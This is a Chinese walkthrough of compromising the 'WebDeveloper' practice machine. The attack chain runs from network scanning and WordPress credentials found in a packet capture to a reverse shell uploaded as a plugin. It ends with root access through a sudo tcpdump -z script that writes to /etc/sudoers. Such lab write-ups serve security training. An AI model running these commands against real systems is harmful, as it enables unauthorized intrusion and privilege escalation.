WebDeveloper 靶机渗透
WebDeveloper 靶机渗透
WebDeveloper 靶机
确定主机 ip
arp-scan -l

信息收集
主机、端口扫描
root@kali:~# nmap -sS -Pn -A -p- 192.168.220.167
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 23:31 EDT
Nmap scan report for 192.168.220.167 (192.168.220.167)
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION 22/tcp open ssh
OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
| 256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
|_ 256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 4.9.8
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Example site – Just another WordPress site
MAC Address: 00:0C:29:27:68:CC (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS 1 0.70 ms 192.168.220.167 (192.168.220.167)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
扫描结果
| 端口 | 信息 |
|---|---|
| 22 | OpenSSH 7.6p1 Ubuntu 4 |
| 80 | WordPress 4.9.8 网站系统 |
80 端口网站

网站目录扫描
dirb http://192.168.220.167/

发现 wordpress 的后台,还发现了一个 ipdata 目录打开之后是一个 wireshark 的数据包文 件,直接点击用 wireshark 打开(OK 按钮点亮需要切换到 Save File 再回到 Open)

使用 wireshark 分析数据包,可以发现 wordpress 登录的用户名和密码

Form item: "log" = "webdeveloper"
Form item: "pwd" = "Te5eQg&4sBS!Yr$)wf%(DcAd"
登录 wordpress 后台成功:http://192.168.220.167/wp-login.php
发现后台的样式中 404.php,这里修改为 shell 代码应该可以 getshell。(后面测试没成功)
漏洞扫描
可以对发现的端口进行破解
| 端口功能 | 实施攻击 |
|---|---|
| 22 端口 SSH | 暴力破解 |
| 80 端口网站 | 已经拿到后台用户名和密码,只需找到漏洞 getshell |
22 端口 SSH 破解
尝试获取到的用户名和密码进行登录 ssh,发现不能登录 webdeveloper Te5eQg&4sBS!Yr$)wf%(DcAd

80 端口 wordpress 网站漏洞扫描
Wordpress 常见漏洞分类:
1. 插件漏洞,样式漏洞(样式 404.php 页面)
2. 各种上传点: 上传插件,上传主题样式,媒体处上传文件
使用 wpscan 扫描网站漏洞,结果出乎意料,没有识别出 wordpress.

过了一段时间回来再次扫描,发现又可以了。。。,枚举一下插件、样式漏洞、后台用户名
wpscan --url http://192.168.220.167/ -e
只找到一个后台用户名,其他没有任何收获

使用 searchsploit 搜索 wordpress 漏洞,因为大多数情况下 wordpress 漏洞都在于插件, 查看后台插件:

搜索插件漏洞:只有一个,没有什么太大价值

上传插件试试,在插件列表上面点击 Add New,增加插件,再点击更新插件(UpdatePlugin)


漏洞利用
利用 wordpress 后台 404.php 页面 GetShell 失败
登录后台找到 404.php 页面,修改代码

修改代码为 php-reverse-shell.php

修改代码中的 ip 地址以及端口,ip 为 kali 的,端口为 nc 监听的端口

修改完之后,更新文件,发现提示不能更新…

利用 wordpress 后台插件上传 GetShell
刚刚已经上传过文件,虽然提示有错误,但是心存侥幸,使用 dirb 重新扫描一下目录

发现了上传目录:
[http://192.168.220.167/wp-content/uploads/](http://192.168.220.167/wp-content/uploads/) 查看:

点开目录发现文件是在的

剩下的就是惯例拿 shell
- 使用 nc 监听
nc -lvp 1234 - 访问上传的文件
php-reverse-shell.php http://192.168.220.167/wp-content/uploads/2020/05/php-reverse-shell.php - 用
python切换bash,python -c 'import pty; pty.spawn("/bin/bash")'

需要使用命令:
python3 -c 'import pty; pty.spawn("/bin/bash")'

4. 查看网站源码敏感信息
结合 ls 命令查看文件夹,最终找到网站根目录:/var/www/html
查看网站配置文件 wp-config.php

得到数据库密码:MasterOfTheUniverse
使用这个密码尝试登录 ssh,成功登录

提权
利用 SUID 权限程序提权失败
查找可以利用的 SUID 权限程序
find / -user root -perm -4000 -print 2>/dev/null
暂时没有发现可以利用的点(常见可利用程序:nmap,vim,find,bash,more,less,nano,cp)
利用 sudo 程序提权
使用 sudo -l 查看权限

可以看到在 webdeveloper 的 shell 中可以使用 sudo 直接以 root 权限启动 tcpdump 查看 tcpdump 命令帮助

-z 命令可以执行任意命令, -Z 可以指定用户
我们只需构造一个将当前用户添加为 root 权限的脚本,用 tcpdump 执行即可
- 制作将当前用户添加为 root 权限的脚本
echo 'echo "webdeveloper ALL=(ALL:ALL) ALL" >> /etc/sudoers' > /tmp/exp.sh - 修改脚本权限
chmod +x /tmp/exp.sh - 使用 tcpdump 执行脚本
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp.sh -Z root
命令解释
-i eth0从指定网卡捕获数据包
-w /dev/null将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command]运行指定的命令
-Z [user]指定用户执行命令
-G [rotate_seconds]每rotate_seconds秒一次的频率执行-w 指定的转储
-W [num]指定抓包数量 - 使用
sudo查看/root文件夹以及flag

- 修改
/etc/shadow文件中的 root 密码hash sudo vim /etc/shadow

切换到 root 用户,密码:MasterOfTheUniverse

小结
本节使用了以下工具:
arp-scan,nmap,dirb,wpscan,nc,tcpdump
本节涉及的漏洞:文件上传漏洞,目录遍历漏洞,权限配置问题漏洞
本节涉及的失败:
ssh 暴力破解失败
wordpress 后台 404.php 利用失败
利用 SUID 权限程序提权失败
领悟小结:
当没有思路时,请继续信息收集 多次尝试重新漏洞利用说不定有意外发现 失败不可怕,可怕的是失败了就放弃了


